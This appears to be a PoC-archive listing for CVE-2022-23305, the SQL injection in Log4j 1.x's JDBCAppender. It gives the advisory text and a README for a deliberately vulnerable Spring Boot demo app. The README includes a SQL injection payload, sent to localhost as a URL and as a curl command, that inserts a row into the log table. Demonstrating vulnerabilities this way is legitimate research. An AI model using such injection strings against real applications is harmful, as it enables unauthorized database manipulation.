Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-23305 PoC — SQL injection in JDBC Appender in Apache Log4j V1

Source
https://github.com/tkomlodi/CVE-2022-23305_POC
Associated Vulnerability
Title:SQL injection in JDBC Appender in Apache Log4j V1 (CVE-2022-23305)
Description:By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Description
CVE-2022-23305 Log4J JDBCAppender SQl injection POC
Readme
# CVE-2022-23305 Log4j JDBCAppender sql injection POC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.

See src/main/java/poc/InjectionController.java for the logging statement.  
See src/main/resource folder for all the configuration files.

You can run the application using Java and Maven by running "mvn clean spring-boot:run".  
You can also run it as a Docker application such as:  
 docker build --tag log4j-poc .  
 docker run -p 8080:8080 log4j-poc  

The app will be available at http://localhost:8080/.  
To exploit the vulnerability, submit an injected sql statement as the parameter which is getting logged:  
 "http://localhost:8080/?param=');insert into logs values(':("  
The return will list the added log entries, containing one that was added by the sql injected into the parameter.  
To do the same with curl use:  
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('
File Snapshot

 [4.0K]  /data/pocs/16d36d5240b2db6601d42cbc85b2e1cbd3b741d8
├── [ 160]  Dockerfile
├── [1.2K]  pom.xml
├── [1.2K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  poc
        │       ├── [ 332]  Application.java
        │       └── [1.2K]  InjectionController.java
        └── [4.0K]  resources
            ├── [ 185]  application.properties
            ├── [ 355]  log4j.properties
            └── [  76]  schema.sql

5 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →